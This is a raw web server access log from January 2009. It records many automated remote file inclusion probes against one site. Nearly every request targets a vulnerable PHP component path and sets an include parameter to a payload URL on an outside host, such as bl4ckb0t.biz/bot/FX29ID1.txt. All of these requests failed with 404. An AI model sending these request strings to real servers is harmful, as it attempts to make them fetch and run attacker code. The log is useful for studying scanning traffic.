222.236.47.182 - - [05/Jan/2009:22:09:42 -0800] "GET /logs/access_081225.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:09:45 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:09:45 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:10:10 -0800] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:10:11 -0800] "GET /logs/access_081226.log%20%20/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:10:11 -0800] "GET /logs/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
62.146.68.47 - - [05/Jan/2009:22:10:52 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bamrecordsinc.com/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
62.146.68.47 - - [05/Jan/2009:22:10:52 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bamrecordsinc.com/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
62.146.68.47 - - [05/Jan/2009:22:10:52 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bamrecordsinc.com/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
218.149.85.37 - - [05/Jan/2009:22:11:10 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
218.149.85.37 - - [05/Jan/2009:22:11:10 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:11:14 -0800] "GET /logs/access_081222.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:14:08 -0800] "GET /logs/access_081220.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.spongyfeet.com"
83.222.23.200 - - [05/Jan/2009:22:15:27 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:15:50 -0800] "GET /logs/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:15:50 -0800] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:16:12 -0800] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:18:10 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/sarahvirna/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:18:10 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/sarahvirna/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:18:10 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/sarahvirna/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:18:11 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:18:11 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:18:11 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/anamoza77/elsiq.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.spongyfeet.com"
62.146.68.47 - - [05/Jan/2009:22:18:48 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://bamrecordsinc.com/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:20:33 -0800] "GET /logs/access_081226.log/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:20:34 -0800] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:20:34 -0800] "GET /logs/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:21:04 -0800] "GET /logs/access_081206.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:21:04 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:21:04 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:21:07 -0800] "GET /logs/access_081207.log/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:21:44 -0800] "GET /logs/access_081207.log/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:21:55 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:21:55 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:21:55 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:22:20 -0800] "GET /include/admin.lib.inc.php?site_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:22:49 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
119.205.209.69 - - [05/Jan/2009:22:23:48 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.spongyfeet.com"
119.205.209.69 - - [05/Jan/2009:22:23:48 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:26:19 -0800] "GET /administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:26:19 -0800] "GET /logs/access_081226.log%20%20/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:26:20 -0800] "GET /logs/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:29:06 -0800] "GET /logs/access_081206.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:22:29:37 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:22:29:37 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:22:29:37 -0800] "GET /logs/access_081226.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
222.236.47.182 - - [05/Jan/2009:22:29:46 -0800] "GET /logs/access_081207.log/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://bl4ckb0t.biz/bot/FX29ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
82.145.162.155 - - [05/Jan/2009:22:30:04 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
82.145.162.155 - - [05/Jan/2009:22:30:04 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.spongyfeet.com"
211.202.2.220 - - [05/Jan/2009:22:30:17 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/kombinasi2000/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
211.202.2.220 - - [05/Jan/2009:22:30:17 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/kombinasi2000/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
211.202.2.220 - - [05/Jan/2009:22:30:17 -0800] "GET /logs/access_081226.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/kombinasi2000/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:31:53 -0800] "GET /logs/access_081204.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/liariri/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.spongyfeet.com"
202.125.46.108 - - [05/Jan/2009:22:32:15 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.asthmant.org.au/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
202.125.46.108 - - [05/Jan/2009:22:32:16 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.asthmant.org.au/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
83.222.23.200 - - [05/Jan/2009:22:32:17 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
202.125.46.108 - - [05/Jan/2009:22:33:42 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.asthmant.org.au/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
202.125.46.108 - - [05/Jan/2009:22:33:44 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.asthmant.org.au/.dat/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:22:34:04 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
211.202.2.220 - - [05/Jan/2009:22:34:48 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/kombinasi2000/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
207.182.137.218 - - [05/Jan/2009:22:35:18 -0800] "GET /logs/access_081204.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.spongyfeet.com"
193.207.106.54 - - [05/Jan/2009:22:35:37 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/kombinasi2000/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
193.207.106.54 - - [05/Jan/2009:22:35:37 -0800] "GET /logs/access_081226.log%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/kombinasi2000/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
193.207.106.54 - - [05/Jan/2009:22:35:37 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/kombinasi2000/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:22:35:47 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:22:35:47 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:22:35:47 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:22:36:28 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:22:36:41 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:22:36:41 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:22:36:41 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.spongyfeet.com"
211.202.2.220 - - [05/Jan/2009:22:37:06 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/kombinasi2000/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
83.222.23.200 - - [05/Jan/2009:22:37:10 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
83.222.23.200 - - [05/Jan/2009:22:37:10 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:22:38:13 -0800] "GET /logs/access_081225.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:22:38:13 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:22:38:13 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:22:39:23 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.spongyfeet.com"
148.245.102.115 - - [05/Jan/2009:22:40:07 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:40:18 -0800] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:40:18 -0800] "GET /include/admin.lib.inc.php?site_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
200.107.138.34 - - [05/Jan/2009:22:40:18 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.spongyfeet.com"
218.234.23.56 - - [05/Jan/2009:22:42:01 -0800] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.spongyfeet.com"
212.116.224.229 - - [05/Jan/2009:22:42:09 -0800] "GET /logs/access_081225.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
212.116.224.229 - - [05/Jan/2009:22:42:09 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
212.116.224.229 - - [05/Jan/2009:22:42:09 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
200.71.60.16 - - [05/Jan/2009:22:45:41 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
200.71.60.16 - - [05/Jan/2009:22:45:41 -0800] "GET /logs/access_081225.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
200.71.60.16 - - [05/Jan/2009:22:45:41 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
212.116.224.229 - - [05/Jan/2009:22:46:18 -0800] "GET /logs/access_081222.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.spongyfeet.com"
208.111.154.16 - - [05/Jan/2009:22:46:41 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.spongyfeet.com"
208.111.154.16 - - [05/Jan/2009:22:46:41 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.spongyfeet.com"
200.204.123.84 - - [05/Jan/2009:22:48:09 -0800] "GET /logs/access_081222.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.spongyfeet.com"
94.23.10.29 - - [05/Jan/2009:22:48:35 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
94.23.10.29 - - [05/Jan/2009:22:48:35 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.spongyfeet.com"
94.23.10.29 - - [05/Jan/2009:22:49:24 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.spongyfeet.com"
94.23.10.29 - - [05/Jan/2009:22:49:24 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.spongyfeet.com"
77.221.130.2 - - [05/Jan/2009:22:50:04 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.spongyfeet.com"
77.221.130.2 - - [05/Jan/2009:22:50:04 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.spongyfeet.com"
